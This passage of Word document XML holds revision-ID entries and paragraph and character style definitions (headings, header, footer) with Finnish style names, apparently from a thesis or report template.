    <w:rsid w:val="1772CBAD"/>
    <w:rsid w:val="17B8D33C"/>
    <w:rsid w:val="17E33D16"/>
    <w:rsid w:val="1974B630"/>
    <w:rsid w:val="1A196DC4"/>
    <w:rsid w:val="1A2D3F6E"/>
    <w:rsid w:val="1A49061A"/>
    <w:rsid w:val="1A5F995D"/>
    <w:rsid w:val="1ADC8B16"/>
    <w:rsid w:val="1AE9BB79"/>
    <w:rsid w:val="1B7731AB"/>
    <w:rsid w:val="1C233CA1"/>
    <w:rsid w:val="1C4B5E06"/>
    <w:rsid w:val="1CA3CBEA"/>
    <w:rsid w:val="1CB9AE22"/>
    <w:rsid w:val="1DBDFACE"/>
    <w:rsid w:val="1DD3A897"/>
    <w:rsid w:val="1E109177"/>
    <w:rsid w:val="1E3474A5"/>
    <w:rsid w:val="1E4FE83D"/>
    <w:rsid w:val="1EB4405B"/>
    <w:rsid w:val="1EEA4A5C"/>
    <w:rsid w:val="1EEA4A5C"/>
    <w:rsid w:val="1EF63990"/>
    <w:rsid w:val="1EF76AFD"/>
    <w:rsid w:val="1F40BF78"/>
    <w:rsid w:val="1FA358B2"/>
    <w:rsid w:val="1FEEC6C4"/>
    <w:rsid w:val="200E5757"/>
    <w:rsid w:val="20A7AED9"/>
    <w:rsid w:val="212582A6"/>
    <w:rsid w:val="229C58A7"/>
    <w:rsid w:val="22E083E6"/>
    <w:rsid w:val="22F6E0E0"/>
    <w:rsid w:val="2333F982"/>
    <w:rsid w:val="236AEB5E"/>
    <w:rsid w:val="23DF78C2"/>
    <w:rsid w:val="24236FA4"/>
    <w:rsid w:val="245B4159"/>
    <w:rsid w:val="248247CD"/>
    <w:rsid w:val="2499C137"/>
    <w:rsid w:val="24BE81A4"/>
    <w:rsid w:val="258C080C"/>
    <w:rsid w:val="25CD8DB9"/>
    <w:rsid w:val="261F289F"/>
    <w:rsid w:val="26312FDF"/>
    <w:rsid w:val="26AC0716"/>
    <w:rsid w:val="26CBEAA1"/>
    <w:rsid w:val="2707585D"/>
    <w:rsid w:val="27079A14"/>
    <w:rsid w:val="27233F7F"/>
    <w:rsid w:val="27825277"/>
    <w:rsid w:val="27850166"/>
    <w:rsid w:val="28553BBD"/>
    <w:rsid w:val="2923B089"/>
    <w:rsid w:val="293671A7"/>
    <w:rsid w:val="297D28D7"/>
    <w:rsid w:val="2993EF47"/>
    <w:rsid w:val="2A47FA2B"/>
    <w:rsid w:val="2A67874A"/>
    <w:rsid w:val="2AE0C924"/>
    <w:rsid w:val="2AFECB81"/>
    <w:rsid w:val="2BD1ACFE"/>
    <w:rsid w:val="2BEAE74A"/>
    <w:rsid w:val="2BF30F3B"/>
    <w:rsid w:val="2C230DDC"/>
    <w:rsid w:val="2C38685C"/>
    <w:rsid w:val="2C5241A2"/>
    <w:rsid w:val="2C5ACED6"/>
    <w:rsid w:val="2CE255D2"/>
    <w:rsid w:val="2D0DF4B3"/>
    <w:rsid w:val="2D18131D"/>
    <w:rsid w:val="2D865053"/>
    <w:rsid w:val="2DE5DF6B"/>
    <w:rsid w:val="2EF04850"/>
    <w:rsid w:val="2F371A93"/>
    <w:rsid w:val="2F397683"/>
    <w:rsid w:val="2FA50798"/>
    <w:rsid w:val="305F9074"/>
    <w:rsid w:val="3083722B"/>
    <w:rsid w:val="30E21A74"/>
    <w:rsid w:val="30E2554B"/>
    <w:rsid w:val="30E58D0C"/>
    <w:rsid w:val="31782F14"/>
    <w:rsid w:val="3353E46D"/>
    <w:rsid w:val="33865737"/>
    <w:rsid w:val="33FBF772"/>
    <w:rsid w:val="34755237"/>
    <w:rsid w:val="34D31C85"/>
    <w:rsid w:val="34F44952"/>
    <w:rsid w:val="359D2582"/>
    <w:rsid w:val="36BC1F02"/>
    <w:rsid w:val="37393A24"/>
    <w:rsid w:val="37823157"/>
    <w:rsid w:val="37ABFC50"/>
    <w:rsid w:val="37C68E53"/>
    <w:rsid w:val="38C8C4C9"/>
    <w:rsid w:val="38D2EBFA"/>
    <w:rsid w:val="3916EA7E"/>
    <w:rsid w:val="3984A0A2"/>
    <w:rsid w:val="39887038"/>
    <w:rsid w:val="39BD4818"/>
    <w:rsid w:val="3A787141"/>
    <w:rsid w:val="3A7A108A"/>
    <w:rsid w:val="3B7BF4D5"/>
    <w:rsid w:val="3B829848"/>
    <w:rsid w:val="3BDEF419"/>
    <w:rsid w:val="3C37E1EA"/>
    <w:rsid w:val="3C3BB4F4"/>
    <w:rsid w:val="3C494772"/>
    <w:rsid w:val="3CD06660"/>
    <w:rsid w:val="3CDFC2DB"/>
    <w:rsid w:val="3CDFD400"/>
    <w:rsid w:val="3CE024AF"/>
    <w:rsid w:val="3D997F46"/>
    <w:rsid w:val="3DAE097F"/>
    <w:rsid w:val="3DB7C444"/>
    <w:rsid w:val="3E7A2B9D"/>
    <w:rsid w:val="40BEFD95"/>
    <w:rsid w:val="4103E91C"/>
    <w:rsid w:val="41551ED9"/>
    <w:rsid w:val="416482F9"/>
    <w:rsid w:val="4188C94B"/>
    <w:rsid w:val="41AC2D23"/>
    <w:rsid w:val="41CF9633"/>
    <w:rsid w:val="41CFAC08"/>
    <w:rsid w:val="4315FD78"/>
    <w:rsid w:val="4376133E"/>
    <w:rsid w:val="443C714E"/>
    <w:rsid w:val="4517F9B4"/>
    <w:rsid w:val="45208843"/>
    <w:rsid w:val="4558ADE3"/>
    <w:rsid w:val="456585DF"/>
    <w:rsid w:val="46500125"/>
    <w:rsid w:val="466B9DA2"/>
    <w:rsid w:val="47101BA8"/>
    <w:rsid w:val="47E589FF"/>
    <w:rsid w:val="4898B81A"/>
    <w:rsid w:val="48A4258C"/>
    <w:rsid w:val="48D9FE2E"/>
    <w:rsid w:val="48F5BB5F"/>
    <w:rsid w:val="48F8EBA3"/>
    <w:rsid w:val="49470BB9"/>
    <w:rsid w:val="499B2F1D"/>
    <w:rsid w:val="49A8A662"/>
    <w:rsid w:val="49C04542"/>
    <w:rsid w:val="49DF4EC4"/>
    <w:rsid w:val="49E009BF"/>
    <w:rsid w:val="49ECDB31"/>
    <w:rsid w:val="49F50E41"/>
    <w:rsid w:val="4A19E9D4"/>
    <w:rsid w:val="4AF330A6"/>
    <w:rsid w:val="4B6D17C9"/>
    <w:rsid w:val="4B86425D"/>
    <w:rsid w:val="4C6E517D"/>
    <w:rsid w:val="4C90DEA6"/>
    <w:rsid w:val="4CB7181E"/>
    <w:rsid w:val="4CBAD62B"/>
    <w:rsid w:val="4D9232B3"/>
    <w:rsid w:val="4DCFF385"/>
    <w:rsid w:val="4DD09583"/>
    <w:rsid w:val="4DD9B76B"/>
    <w:rsid w:val="4E4F7488"/>
    <w:rsid w:val="4F8FA9A9"/>
    <w:rsid w:val="4FB31DEF"/>
    <w:rsid w:val="50506180"/>
    <w:rsid w:val="507232B0"/>
    <w:rsid w:val="511F1D95"/>
    <w:rsid w:val="516A19E8"/>
    <w:rsid w:val="517A17F4"/>
    <w:rsid w:val="519C969E"/>
    <w:rsid w:val="51BDA952"/>
    <w:rsid w:val="51E651A2"/>
    <w:rsid w:val="51F45308"/>
    <w:rsid w:val="521E02FA"/>
    <w:rsid w:val="52547B8C"/>
    <w:rsid w:val="528D13FA"/>
    <w:rsid w:val="52CB90F9"/>
    <w:rsid w:val="52EB87D8"/>
    <w:rsid w:val="52EDA474"/>
    <w:rsid w:val="52F37EE3"/>
    <w:rsid w:val="52FD4F57"/>
    <w:rsid w:val="531D8EAE"/>
    <w:rsid w:val="5360F102"/>
    <w:rsid w:val="53AE08E2"/>
    <w:rsid w:val="53CBAD01"/>
    <w:rsid w:val="53CC2CE6"/>
    <w:rsid w:val="53EB68E0"/>
    <w:rsid w:val="549DA05F"/>
    <w:rsid w:val="5574B0D5"/>
    <w:rsid w:val="55757FCE"/>
    <w:rsid w:val="55DB91CF"/>
    <w:rsid w:val="55E45F12"/>
    <w:rsid w:val="561C3286"/>
    <w:rsid w:val="565BEFD9"/>
    <w:rsid w:val="5662ADBB"/>
    <w:rsid w:val="5667AE5E"/>
    <w:rsid w:val="56744C5B"/>
    <w:rsid w:val="57F5F5D9"/>
    <w:rsid w:val="586E88FD"/>
    <w:rsid w:val="5937CF1C"/>
    <w:rsid w:val="597143F7"/>
    <w:rsid w:val="5A270E2C"/>
    <w:rsid w:val="5A3D21F7"/>
    <w:rsid w:val="5B714D1A"/>
    <w:rsid w:val="5B935079"/>
    <w:rsid w:val="5B9E23F6"/>
    <w:rsid w:val="5BCEDE05"/>
    <w:rsid w:val="5C5293AC"/>
    <w:rsid w:val="5C8CA146"/>
    <w:rsid w:val="5CADD55B"/>
    <w:rsid w:val="5D54C1E5"/>
    <w:rsid w:val="5DBC588F"/>
    <w:rsid w:val="5DD1F313"/>
    <w:rsid w:val="5E519AF8"/>
    <w:rsid w:val="5EAAD3CF"/>
    <w:rsid w:val="5EF0C3CC"/>
    <w:rsid w:val="5F6C0501"/>
    <w:rsid w:val="5F877200"/>
    <w:rsid w:val="5FA36197"/>
    <w:rsid w:val="5FC01AE0"/>
    <w:rsid w:val="5FC62DB7"/>
    <w:rsid w:val="5FD3D9FB"/>
    <w:rsid w:val="605EF1C1"/>
    <w:rsid w:val="60A3E724"/>
    <w:rsid w:val="60ED5C19"/>
    <w:rsid w:val="6145CEA3"/>
    <w:rsid w:val="615FB122"/>
    <w:rsid w:val="619C79EF"/>
    <w:rsid w:val="61DD4BCD"/>
    <w:rsid w:val="621CC009"/>
    <w:rsid w:val="62606FE9"/>
    <w:rsid w:val="6306449F"/>
    <w:rsid w:val="633E8A95"/>
    <w:rsid w:val="6386EB96"/>
    <w:rsid w:val="638CD141"/>
    <w:rsid w:val="6398DE70"/>
    <w:rsid w:val="63C1222F"/>
    <w:rsid w:val="63E7F7FC"/>
    <w:rsid w:val="641CE770"/>
    <w:rsid w:val="64A0F965"/>
    <w:rsid w:val="64C36264"/>
    <w:rsid w:val="6551DF39"/>
    <w:rsid w:val="6553367E"/>
    <w:rsid w:val="6560C003"/>
    <w:rsid w:val="659EC92D"/>
    <w:rsid w:val="65B29A17"/>
    <w:rsid w:val="65D1C03F"/>
    <w:rsid w:val="65F68137"/>
    <w:rsid w:val="660D5495"/>
    <w:rsid w:val="66227AC2"/>
    <w:rsid w:val="66801F9A"/>
    <w:rsid w:val="66922D38"/>
    <w:rsid w:val="66D6BBD0"/>
    <w:rsid w:val="66EB84B9"/>
    <w:rsid w:val="66ECECA5"/>
    <w:rsid w:val="672D5F12"/>
    <w:rsid w:val="675BDC93"/>
    <w:rsid w:val="678F96C8"/>
    <w:rsid w:val="67A76436"/>
    <w:rsid w:val="67ACA984"/>
    <w:rsid w:val="67BDA2C3"/>
    <w:rsid w:val="67D72F8C"/>
    <w:rsid w:val="68402CBF"/>
    <w:rsid w:val="684317E1"/>
    <w:rsid w:val="68A84E73"/>
    <w:rsid w:val="68C64D89"/>
    <w:rsid w:val="68CD2AFF"/>
    <w:rsid w:val="69019272"/>
    <w:rsid w:val="696127F9"/>
    <w:rsid w:val="6973130A"/>
    <w:rsid w:val="69C25FF6"/>
    <w:rsid w:val="6A3E959B"/>
    <w:rsid w:val="6A9DCC2F"/>
    <w:rsid w:val="6AAAD2E9"/>
    <w:rsid w:val="6AB08943"/>
    <w:rsid w:val="6B89485D"/>
    <w:rsid w:val="6BD90B5C"/>
    <w:rsid w:val="6C1183E6"/>
    <w:rsid w:val="6C150521"/>
    <w:rsid w:val="6C50AFC0"/>
    <w:rsid w:val="6C93217B"/>
    <w:rsid w:val="6CB5AB37"/>
    <w:rsid w:val="6CC495E5"/>
    <w:rsid w:val="6D60B0B9"/>
    <w:rsid w:val="6D67DA6A"/>
    <w:rsid w:val="6DC2F6BF"/>
    <w:rsid w:val="6F45E5BD"/>
    <w:rsid w:val="6FA8F276"/>
    <w:rsid w:val="6FB26931"/>
    <w:rsid w:val="702BE4F6"/>
    <w:rsid w:val="708FB5F4"/>
    <w:rsid w:val="709DEBD4"/>
    <w:rsid w:val="71112926"/>
    <w:rsid w:val="715216E6"/>
    <w:rsid w:val="724341DA"/>
    <w:rsid w:val="72D1A53D"/>
    <w:rsid w:val="731CBB43"/>
    <w:rsid w:val="73667D70"/>
    <w:rsid w:val="740B5A0B"/>
    <w:rsid w:val="74860DAC"/>
    <w:rsid w:val="75096EA3"/>
    <w:rsid w:val="750E3A2C"/>
    <w:rsid w:val="75309EA7"/>
    <w:rsid w:val="754E569F"/>
    <w:rsid w:val="75766FA6"/>
    <w:rsid w:val="757D8445"/>
    <w:rsid w:val="75D59263"/>
    <w:rsid w:val="7697065E"/>
    <w:rsid w:val="76E7221E"/>
    <w:rsid w:val="776C2669"/>
    <w:rsid w:val="779275C9"/>
    <w:rsid w:val="784A507A"/>
    <w:rsid w:val="797D8C43"/>
    <w:rsid w:val="79B3ABD6"/>
    <w:rsid w:val="7A5AD2B8"/>
    <w:rsid w:val="7AD31A21"/>
    <w:rsid w:val="7B318CC8"/>
    <w:rsid w:val="7B76617E"/>
    <w:rsid w:val="7B848FCF"/>
    <w:rsid w:val="7B9B4A7D"/>
    <w:rsid w:val="7C09D266"/>
    <w:rsid w:val="7C1AB83A"/>
    <w:rsid w:val="7C6DDEDC"/>
    <w:rsid w:val="7C6FB7A8"/>
    <w:rsid w:val="7C8B7D33"/>
    <w:rsid w:val="7C8C2C3E"/>
    <w:rsid w:val="7CC95CCA"/>
    <w:rsid w:val="7D20CF66"/>
    <w:rsid w:val="7D3FFD1B"/>
    <w:rsid w:val="7D656329"/>
    <w:rsid w:val="7D69D1B0"/>
    <w:rsid w:val="7DAA203D"/>
    <w:rsid w:val="7DB7C00F"/>
    <w:rsid w:val="7DEEB69B"/>
    <w:rsid w:val="7E019E0E"/>
    <w:rsid w:val="7E0ACC01"/>
    <w:rsid w:val="7E182E19"/>
    <w:rsid w:val="7E317B17"/>
    <w:rsid w:val="7E803E95"/>
    <w:rsid w:val="7EB1A008"/>
    <w:rsid w:val="7F5725F8"/>
    <w:rsid w:val="7F644E76"/>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98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Theme="minorHAnsi" w:cstheme="minorHAnsi"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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ali" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B0722F"/>
    <w:pPr>
      <w:spacing w:after="480" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C03E35"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="431" w:hanging="431"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C03E35"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="578" w:hanging="578"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C03E35"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00893194"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="A90452" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="700336" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="700336" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="29"/>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Kappaleenoletusfontti" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:styleId="Normaalitaulukko" w:default="1">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Eiluetteloa" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko1Char" w:customStyle="1">
    <w:name w:val="Otsikko 1 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C03E35"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko2Char" w:customStyle="1">
    <w:name w:val="Otsikko 2 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C03E35"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko3Char" w:customStyle="1">
    <w:name w:val="Otsikko 3 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C03E35"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko4Char" w:customStyle="1">
    <w:name w:val="Otsikko 4 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00893194"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko5Char" w:customStyle="1">
    <w:name w:val="Otsikko 5 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="A90452" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko6Char" w:customStyle="1">
    <w:name w:val="Otsikko 6 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="700336" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko7Char" w:customStyle="1">
    <w:name w:val="Otsikko 7 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="700336" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko8Char" w:customStyle="1">
    <w:name w:val="Otsikko 8 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Otsikko9Char" w:customStyle="1">
    <w:name w:val="Otsikko 9 Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Sivunumero">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B80541"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Yltunniste">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="YltunnisteChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520772"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="YltunnisteChar" w:customStyle="1">
    <w:name w:val="Ylätunniste Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Yltunniste"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00520772"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Alatunniste">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="AlatunnisteChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00520772"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="AlatunnisteChar" w:customStyle="1">
    <w:name w:val="Alatunniste Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Alatunniste"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0056618C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvailulehtinormaali" w:customStyle="1">
    <w:name w:val="Kuvailulehti_normaali"/>
    <w:link w:val="KuvailulehtinormaaliChar"/>
    <w:rsid w:val="003D3422"/>
    <w:pPr>
